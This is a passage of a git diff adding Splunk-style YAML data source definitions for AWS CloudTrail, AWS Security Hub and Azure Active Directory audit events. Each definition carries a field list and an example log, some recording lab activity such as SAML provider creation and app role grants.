fes3AYqv/axoJpSm1uZP2066816bYIpOMjcc5yQaEzFh6Y2d5Ovd+DJ/BLVmTFuKs9p9q5JCpOQQT73c0actHdXsjZeM0iHbuWtQOu6LHJuQRbl7BCdKblLvpnoF7DrAHLq1xArcSUEuXa590aga7Ld9P/6BrTQ26QdGGfmJlRiaWh5iu22lbI169NlFd+EmgXIFWK0Qu6i7zyNkGTTA2GOOG9Z/vNIGKRxmV4l7KN</X509Certificate></X509Data></KeyInfo></KeyDescriptor><fed:TargetScopes><wsa:EndpointReference
+  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://sts.windows.net/0e8108b1-18e9-41a4-961b-dfcddf92ef08/</wsa:Address></wsa:EndpointReference></fed:TargetScopes><fed:ApplicationServiceEndpoint><wsa:EndpointReference
+  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:ApplicationServiceEndpoint><fed:PassiveRequestorEndpoint><wsa:EndpointReference
+  xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"><wsa:Address>https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/wsfed</wsa:Address></wsa:EndpointReference></fed:PassiveRequestorEndpoint></RoleDescriptor><IDPSSODescriptor
+  protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\"><KeyDescriptor
+  use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIDPzCCAiegAwIBAgIQOpwRqLOiO5dOnZepSd5yJzANBgkqhkiG9w0BAQsFADAhMR8wHQYDVQQDDBZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB4XDTIxMDEwNjIyMzAyMloXDTIyMDEwNjIyNTAyMlowITEfMB0GA1UEAwwWYWRmcy5hdHRhY2tyYW5nZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKCwp37iASl3qvAbIyYGI1HOwIlZCAuwLZF+ROf0SVpl+KC19nR+ws7NjacsxsugHMUT1gc9On/l0Jn5pF6VFFcPyPsVvaxLJ+YMY0SBcIHp1iQOKfA2jIFXs4eoLzcrOpX0vqkKsZEPsUAN8tz7OYOPyIP4gylV6hh3nNJXQ2ogeTHXmrpI7wDrAY72g9tDCAitRvAu+nZOLnYaQ3YmnJJGZd+YvmRUd7WAwngYEbJss55ZcL/JU3VJQMJ7OGtjFhjayDT/dUdtvBUqsfF27cArbT5WgGm8WX+WWrJTJgqhQ9YpRUXFajt7Ky5fDLG1cuL6FCHpfrBuRsy7MdY/B+0CAwEAAaNzMHEwDgYDVR0PAQH/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAhBgNVHREEGjAYghZhZGZzLmF0dGFja3JhbmdlLmxvY2FsMB0GA1UdDgQWBBQCPwpG/CPNUFbkjPjBuXJr1AOIdzANBgkqhkiG9w0BAQsFAAOCAQEAlzPZxjHF8tLmpf2KLeu9OlVSdcJ/vER7H/3gZmDEnNET/FHbY20npgiQgyk2XoM9WBe9zsuDcORfhndUnW+NHaAHZfdTvtvq1wPoqnEFdedRKMoXU7DtcHHnK533/4ysdcpI8rMS4Tg/WTmFHmubs0xc1TGHL4nVPC1p7Tz6ijkluHxkZFjf0VER/lc6LBXxhEgPuX+aYFvMq1Ty8dYbYjQ9C1sKWYavOnR11pB3uGTRYaj0FwTGhP/UfpkKuaKRhx0j1Iwe01rNDl1+tWhAwZXGDFFcJMTx/Z+vCcSlijBLeVCP7mmm0QgFn7AWrqhAUKkqfcVVvYLgi+FTcuJuSA==</X509Certificate></X509Data></KeyInfo></KeyDescriptor><KeyDescriptor
+  use=\"signing\"><KeyInfo xmlns=\"http://www.w3.org/2000/09/xmldsig#\"><X509Data><X509Certificate>MIIC8DCCAdigAwIBAgIQMN9XaFEOfIpMuOqq+1JFzzANBgkqhkiG9w0BAQsFADA0MTIwMAYDVQQDEylNaWNyb3NvZnQgQXp1cmUgRmVkZXJhdGVkIFNTTyBDZXJ0aWZpY2F0ZTAeFw0yMTAxMTcxODU2MTZaFw0yNDAxMTcyMTU2MTRaMDQxMjAwBgNVBAMTKU1pY3Jvc29mdCBBenVyZSBGZWRlcmF0ZWQgU1NPIENlcnRpZmljYXRlMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2GO3vs2HPr+EXEVnWNRDOIjxS5tP2i9xq/399CAl/sWSbJkooGjcCKWf0DN1cGbbbrzL/V+Hor/htEFBpsbUsL8NbaE5pZOnH3oWquiHFiMs1t3Dh4dSVViKyMgIx/i5j4qUW74fYHvgead3kTIV7oSIYHXPNSF6SGLR8qWgRSCLre5P80PnzQmFoI1MbfJbJWf4rWBRVylJaamRFi8X/9byGAQKNYtrjnxCPtdvqUG03EMvwrUCTOM49qnuUhHUCtrIk8MQ1/xzHePkWT3OXmfCi0ABDFAnb9GH763rLlrawVaZKMzmICQ/Rts3+NUm0urSbPlUq1+IfbCsRCwz/QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA+ZOJcY1oGsj/LLa0KLhlUolA7dojhwDtZFPRInLcyBQ6G2fkEZr7jdgY0vg8X86vFCw2JLIC5UmUrXsC1YGxD0kzdMAqr06uVOxGKD/QCRKfes3AYqv/axoJpSm1uZP2066816bYIpOMjcc5yQaEzFh6Y2d5Ovd+DJ/BLVmTFuKs9p9q5JCpOQQT73c0actHdXsjZeM0iHbuWtQOu6LHJuQRbl7BCdKblLvpnoF7DrAHLq1xArcSUEuXa590aga7Ld9P/6BrTQ26QdGGfmJlRiaWh5iu22lbI169NlFd+EmgXIFWK0Qu6i7zyNkGTTA2GOOG9Z/vNIGKRxmV4l7KN</X509Certificate></X509Data></KeyInfo></KeyDescriptor><SingleLogoutService
+  Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/saml2\"
+  /><SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\"
+  Location=\"https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/saml2\"
+  /><SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST\"
+  Location=\"https://login.microsoftonline.com/0e8108b1-18e9-41a4-961b-dfcddf92ef08/saml2\"
+  /></IDPSSODescriptor></EntityDescriptor>", "sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"},
+  "responseElements": {"sAMLProviderArn": "arn:aws:iam::111111111111:saml-provider/rodsotoonmicrosoft"},
+  "requestID": "83d621ad-5b33-4ff0-acf4-0043cb432844", "eventID": "51b6d859-0cc4-4591-ba76-3494f3f43832",
+  "readOnly": false, "eventType": "AwsApiCall", "managementEvent": true, "eventCategory":
+  "Management", "recipientAccountId": "111111111111"}'
diff --git a/data_sources/aws_cloudtrail_updatetrail.yml b/data_sources/aws_cloudtrail_updatetrail.yml
new file mode 100644
index 0000000000..5da5e0619d
--- /dev/null
+++ b/data_sources/aws_cloudtrail_updatetrail.yml
@@ -0,0 +1,107 @@
+name: AWS CloudTrail UpdateTrail
+id: d5b7a1eb-711a-4c96-aa93-235fe3c8a939
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail UpdateTrail
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.includeGlobalServiceEvents
+- requestParameters.isMultiRegionTrail
+- requestParameters.name
+- responseElements.includeGlobalServiceEvents
+- responseElements.isMultiRegionTrail
+- responseElements.isOrganizationTrail
+- responseElements.logFileValidationEnabled
+- responseElements.name
+- responseElements.s3BucketName
+- responseElements.trailARN
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli",
+  "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName":
+  "gowthamaraj_cli"}, "eventTime": "2022-07-19T08:42:26Z", "eventSource": "cloudtrail.amazonaws.com",
+  "eventName": "UpdateTrail", "awsRegion": "us-west-2", "sourceIPAddress": "67.171.71.185",
+  "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off
+  command/cloudtrail.update-trail", "requestParameters": {"name": "Regulatory", "includeGlobalServiceEvents":
+  true, "isMultiRegionTrail": true}, "responseElements": {"name": "Regulatory", "s3BucketName":
+  "s3-for-cloudtrail-logs111", "includeGlobalServiceEvents": true, "isMultiRegionTrail":
+  true, "trailARN": "arn:aws:cloudtrail:us-west-2:111111111111:trail/Regulatory",
+  "logFileValidationEnabled": false, "isOrganizationTrail": false}, "requestID": "0da61466-5bba-43f9-b7e1-27437de120b2",
+  "eventID": "ce02af60-f29e-4bc2-8b29-31c12f408fed", "readOnly": false, "eventType":
+  "AwsApiCall", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory":
+  "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256",
+  "clientProvidedHostHeader": "cloudtrail.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/cloud/AWS_Security_Hub.yml b/data_sources/aws_security_hub.yml
similarity index 54%
rename from data_sources/cloud/AWS_Security_Hub.yml
rename to data_sources/aws_security_hub.yml
index b03d92f5e1..7d78a1de32 100644
--- a/data_sources/cloud/AWS_Security_Hub.yml
+++ b/data_sources/aws_security_hub.yml
@@ -1,119 +1,120 @@
 name: AWS Security Hub
 id: b02bfbf3-294f-478e-99a1-e24b8c692d7e
+version: 1
+date: '2024-07-18'
 author: Patrick Bareiss, Splunk
+description: Data source object for AWS Security Hub
 source: aws_securityhub_finding
 sourcetype: aws:securityhub:finding
 supported_TA:
-  name: Splunk Add-on for Amazon Web Services (AWS)
-  version: 7.4.1
+- name: Splunk Add-on for Amazon Web Services (AWS)
   url: https://splunkbase.splunk.com/app/1876
-event_names: []
+  version: 7.4.1
 fields:
-  - _time
-  - AwsAccountId
-  - CreatedAt
-  - Description
-  - FirstObservedAt
-  - GeneratorId
-  - Id
-  - LastObservedAt
-  - ProductArn
-  - ProductFields.aws/guardduty/service/action/actionType
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/api
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
-  - ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
-  - ProductFields.aws/guardduty/service/additionalInfo/sample
-  - ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
-  - ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
-  - ProductFields.aws/guardduty/service/archived
-  - ProductFields.aws/guardduty/service/count
-  - ProductFields.aws/guardduty/service/detectorId
-  - ProductFields.aws/guardduty/service/eventFirstSeen
-  - ProductFields.aws/guardduty/service/eventLastSeen
-  - ProductFields.aws/guardduty/service/resourceRole
-  - ProductFields.aws/guardduty/service/serviceName
-  - ProductFields.aws/securityhub/CompanyName
-  - ProductFields.aws/securityhub/FindingId
-  - ProductFields.aws/securityhub/ProductName
-  - RecordState
-  - Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
-  - Resources{}.Details.AwsEc2Instance.ImageId
-  - Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
-  - Resources{}.Details.AwsEc2Instance.LaunchedAt
-  - Resources{}.Details.AwsEc2Instance.SubnetId
-  - Resources{}.Details.AwsEc2Instance.Type
-  - Resources{}.Details.AwsEc2Instance.VpcId
-  - Resources{}.Details.AwsIamAccessKey.PrincipalId
-  - Resources{}.Details.AwsIamAccessKey.PrincipalName
-  - Resources{}.Details.AwsIamAccessKey.PrincipalType
-  - Resources{}.Details.AwsS3Bucket.CreatedAt
-  - Resources{}.Details.AwsS3Bucket.OwnerId
-  - Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
-  - Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
-  - Resources{}.Id
-  - Resources{}.Partition
-  - Resources{}.Region
-  - Resources{}.Tags.GeneratedFindingInstaceTag1
-  - Resources{}.Tags.GeneratedFindingInstaceTag2
-  - Resources{}.Tags.GeneratedFindingInstaceTag3
-  - Resources{}.Tags.GeneratedFindingInstaceTag4
-  - Resources{}.Tags.GeneratedFindingInstaceTag5
-  - Resources{}.Tags.GeneratedFindingInstaceTag6
-  - Resources{}.Tags.GeneratedFindingInstaceTag7
-  - Resources{}.Tags.GeneratedFindingInstaceTag8
-  - Resources{}.Tags.GeneratedFindingInstaceTag9
-  - Resources{}.Tags.foo
-  - Resources{}.Type
-  - SchemaVersion
-  - Severity.Label
-  - Severity.Normalized
-  - Severity.Product
-  - SourceUrl
-  - Title
-  - Types{}
-  - UpdatedAt
-  - Workflow.Status
-  - WorkflowState
-  - accesskey_extract
-  - app
-  - body
-  - description
-  - dest
-  - dest_type
-  - eventtype
-  - host
-  - id
-  - index
-  - instance_extract
-  - linecount
-  - punct
-  - s3bucket_extract
-  - severity
-  - severity_id
-  - signature
-  - signature_id
-  - source
-  - sourcetype
-  - splunk_server
-  - subject
-  - tag
-  - tag::eventtype
-  - timestamp
-  - type
-  - vendor_account
-  - vendor_region
-example_log:
-  '{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
+- _time
+- AwsAccountId
+- CreatedAt
+- Description
+- FirstObservedAt
+- GeneratorId
+- Id
+- LastObservedAt
+- ProductArn
+- ProductFields.aws/guardduty/service/action/actionType
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/affectedResources/AWS::S3::Bucket
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/api
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/callerType
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/city/cityName
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/country/countryName
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lat
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/geoLocation/lon
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/ipAddressV4
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asn
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/asnOrg
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/isp
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/remoteIpDetails/organization/org
+- ProductFields.aws/guardduty/service/action/awsApiCallAction/serviceName
+- ProductFields.aws/guardduty/service/additionalInfo/sample
+- ProductFields.aws/guardduty/service/additionalInfo/unusual/hoursOfDay.0_
+- ProductFields.aws/guardduty/service/additionalInfo/unusual/userNames.0_
+- ProductFields.aws/guardduty/service/archived
+- ProductFields.aws/guardduty/service/count
+- ProductFields.aws/guardduty/service/detectorId
+- ProductFields.aws/guardduty/service/eventFirstSeen
+- ProductFields.aws/guardduty/service/eventLastSeen
+- ProductFields.aws/guardduty/service/resourceRole
+- ProductFields.aws/guardduty/service/serviceName
+- ProductFields.aws/securityhub/CompanyName
+- ProductFields.aws/securityhub/FindingId
+- ProductFields.aws/securityhub/ProductName
+- RecordState
+- Resources{}.Details.AwsEc2Instance.IamInstanceProfileArn
+- Resources{}.Details.AwsEc2Instance.ImageId
+- Resources{}.Details.AwsEc2Instance.IpV4Addresses{}
+- Resources{}.Details.AwsEc2Instance.LaunchedAt
+- Resources{}.Details.AwsEc2Instance.SubnetId
+- Resources{}.Details.AwsEc2Instance.Type
+- Resources{}.Details.AwsEc2Instance.VpcId
+- Resources{}.Details.AwsIamAccessKey.PrincipalId
+- Resources{}.Details.AwsIamAccessKey.PrincipalName
+- Resources{}.Details.AwsIamAccessKey.PrincipalType
+- Resources{}.Details.AwsS3Bucket.CreatedAt
+- Resources{}.Details.AwsS3Bucket.OwnerId
+- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.KMSMasterKeyID
+- Resources{}.Details.AwsS3Bucket.ServerSideEncryptionConfiguration.Rules{}.ApplyServerSideEncryptionByDefault.SSEAlgorithm
+- Resources{}.Id
+- Resources{}.Partition
+- Resources{}.Region
+- Resources{}.Tags.GeneratedFindingInstaceTag1
+- Resources{}.Tags.GeneratedFindingInstaceTag2
+- Resources{}.Tags.GeneratedFindingInstaceTag3
+- Resources{}.Tags.GeneratedFindingInstaceTag4
+- Resources{}.Tags.GeneratedFindingInstaceTag5
+- Resources{}.Tags.GeneratedFindingInstaceTag6
+- Resources{}.Tags.GeneratedFindingInstaceTag7
+- Resources{}.Tags.GeneratedFindingInstaceTag8
+- Resources{}.Tags.GeneratedFindingInstaceTag9
+- Resources{}.Tags.foo
+- Resources{}.Type
+- SchemaVersion
+- Severity.Label
+- Severity.Normalized
+- Severity.Product
+- SourceUrl
+- Title
+- Types{}
+- UpdatedAt
+- Workflow.Status
+- WorkflowState
+- accesskey_extract
+- app
+- body
+- description
+- dest
+- dest_type
+- eventtype
+- host
+- id
+- index
+- instance_extract
+- linecount
+- punct
+- s3bucket_extract
+- severity
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- subject
+- tag
+- tag::eventtype
+- timestamp
+- type
+- vendor_account
+- vendor_region
+example_log: '{"ProductArn":"arn:aws:securityhub:us-east-1::product/aws/guardduty","Types":["Software
   and Configuration Checks/Exfiltration:S3.ObjectRead.Unusual"],"SourceUrl":"https://us-east-1.console.aws.amazon.com/guardduty/home?region=us-east-1#/findings?macros=current&fId=6aba6b696aea10606e8b336f68d98819","Description":"Principal
   GeneratedFindingUserName read objects from S3 bucket GeneratedFindingS3Bucket in
   an unusual way.","SchemaVersion":"2018-10-08","GeneratorId":"arn:aws:guardduty:us-east-1:802684071507:detector/48ba636359b884eb132865311fdeb317","FirstObservedAt":"2020-09-28T22:26:15.636Z","CreatedAt":"2020-09-28T22:26:15.636Z","RecordState":"ACTIVE","Title":"Unusual
diff --git a/data_sources/azure_active_directory.yml b/data_sources/azure_active_directory.yml
new file mode 100644
index 0000000000..c7e338765b
--- /dev/null
+++ b/data_sources/azure_active_directory.yml
@@ -0,0 +1,13 @@
+name: Azure Active Directory
+id: 51ca21e5-bda2-4652-bb29-27c7bc18a81c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory 
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
diff --git a/data_sources/azure_active_directory_add_app_role_assignment_to_service_principal.yml b/data_sources/azure_active_directory_add_app_role_assignment_to_service_principal.yml
new file mode 100644
index 0000000000..a0a468ad65
--- /dev/null
+++ b/data_sources/azure_active_directory_add_app_role_assignment_to_service_principal.yml
@@ -0,0 +1,120 @@
+name: Azure Active Directory Add app role assignment to service principal
+id: 8b2e84cd-6db0-47e9-badc-75c17df1995f
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add app role assignment
+  to service principal
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- additional_details
+- additional_details_name
+- additional_details_value
+- category
+- command
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_type
+- durationMs
+- dvc
+- eventtype
+- host
+- id
+- identity
+- index
+- linecount
+- object_attrs
+- object_id
+- operationName
+- operationVersion
+- path_from_resourceId
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.app.appId
+- properties.initiatedBy.app.displayName
+- properties.initiatedBy.app.servicePrincipalId
+- properties.initiatedBy.app.servicePrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- result
+- resultSignature
+- result_id
+- signature
+- source
+- sourcetype
+- splunk_server
+- src_user_type
+- status
+- tag
+- tag::eventtype
+- tenantId
+- time
+- timeendpos
+- timestartpos
+- user_agent
+- user_type
+- vendor_account
+- vendor_product
+example_log: '{"time": "2024-02-08T21:49:53.7643129Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam",
+  "operationName": "Add app role assignment to service principal", "operationVersion":
+  "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4",
+  "resultSignature": "None", "durationMs": 0, "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433",
+  "identity": "LegacyTestOAuthApp", "Level": 4, "properties": {"id": "Directory_ed53faec-49b5-444f-b6af-b928558ca433_XH34Q_29215277",
+  "category": "ApplicationManagement", "correlationId": "ed53faec-49b5-444f-b6af-b928558ca433",
+  "result": "success", "resultReason": "", "activityDisplayName": "Add app role assignment
+  to service principal", "activityDateTime": "2024-02-08T21:49:53.7643129+00:00",
+  "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null,
+  "initiatedBy": {"app": {"appId": null, "displayName": "LegacyTestOAuthApp", "servicePrincipalId":
+  "fc8c8125-bc0c-499d-8344-e53c6e3caa81", "servicePrincipalName": null}}, "targetResources":
+  [{"id": "8429eb5c-faeb-4ade-8eac-acc003790769", "displayName": "Office 365 Exchange
+  Online", "type": "ServicePrincipal", "modifiedProperties": [{"displayName": "AppRole.Id",
+  "oldValue": null, "newValue": "\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\""}, {"displayName":
+  "AppRole.Value", "oldValue": null, "newValue": "\"full_access_as_app\""}, {"displayName":
+  "AppRole.DisplayName", "oldValue": null, "newValue": "\"Use Exchange Web Services
+  with full access to all mailboxes\""}, {"displayName": "AppRoleAssignment.CreatedDateTime",
+  "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""}, {"displayName":
+  "AppRoleAssignment.LastModifiedDateTime", "oldValue": null, "newValue": "\"2024-02-08T21:49:53.6813076Z\""},
+  {"displayName": "ServicePrincipal.ObjectID", "oldValue": null, "newValue": "\"2e5c2fd0-cca4-452c-9891-a07c0dafd964\""},
+  {"displayName": "ServicePrincipal.DisplayName", "oldValue": null, "newValue": "\"STRT_Oauth\""},
+  {"displayName": "ServicePrincipal.AppId", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""},
+  {"displayName": "ServicePrincipal.Name", "oldValue": null, "newValue": "\"5f91ce94-4cc5-4ebe-aeb6-f074e57201bb\""},
+  {"displayName": "TargetId.ServicePrincipalNames", "oldValue": null, "newValue":
+  "\"https://outlook.office.com;Microsoft.Exchange;00000002-0000-0ff1-ce00-000000000000;00000002-0000-0ff1-ce00-000000000000/*.outlook.com;00000002-0000-0ff1-ce00-000000000000/outlook.com;00000002-0000-0ff1-ce00-000000000000/mail.office365.com;00000002-0000-0ff1-ce00-000000000000/outlook.office365.com;https://webmail.apps.mil/;https://ps.protection.outlook.com/;https://outlook-dod.office365.us/;https://outlook.com/;https://outlook.office365.com/;https://outlook.office.com/;https://outlook.office365.com:443/;https://outlook-sdf.office365.com/;https://outlook-sdf.office.com/;https://outlook.office365.us/;https://autodiscover-s.office365.us/;https://ps.compliance.protection.outlook.com;https://manage.protection.apps.mil;https://outlook-tdf.office.com/;https://outlook-tdf-2.office.com/;https://ps.outlook.com\""}],
+  "administrativeUnits": []}, {"id": "2e5c2fd0-cca4-452c-9891-a07c0dafd964", "displayName":
+  "5f91ce94-4cc5-4ebe-aeb6-f074e57201bb", "type": "ServicePrincipal", "modifiedProperties":
+  [], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+  "Mozilla/5.0 (Macintosh; Darwin 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20
+  21:28:58 PST 2023; root:xnu-10002.81.5~7/RELEASE_X86_64; en-US) PowerShell/7.3.4"},
+  {"key": "AppId", "value": "00000002-0000-0ff1-ce00-000000000000"}]}}'
diff --git a/data_sources/azure_active_directory_add_member_to_role.yml b/data_sources/azure_active_directory_add_member_to_role.yml
new file mode 100644
index 0000000000..ae7be77cc6
--- /dev/null
+++ b/data_sources/azure_active_directory_add_member_to_role.yml
@@ -0,0 +1,85 @@
+name: Azure Active Directory Add member to role
+id: 1660d196-127f-4678-81b2-472d51711b07
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Add member to role
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-04-28T16:39:51.9312625Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Add member to role", "operationVersion": "1.0", "category": "AuditLogs",
+  "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs":
+  0, "callerIpAddress": "52.177.250.168", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b",
+  "Level": 4, "properties": {"id": "Directory_b425f2d7-2245-4952-b599-61dff8054f2b_FLAW0_72812697",
+  "category": "RoleManagement", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b",
+  "result": "success", "resultReason": "", "activityDisplayName": "Add member to role",
+  "activityDateTime": "2023-04-28T16:39:51.9312625+00:00", "loggedByService": "Core
+  Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user":
+  {"id": "3bd47e42-37c9-442f-a2b4-f04de61ef0ce", "displayName": null, "userPrincipalName":
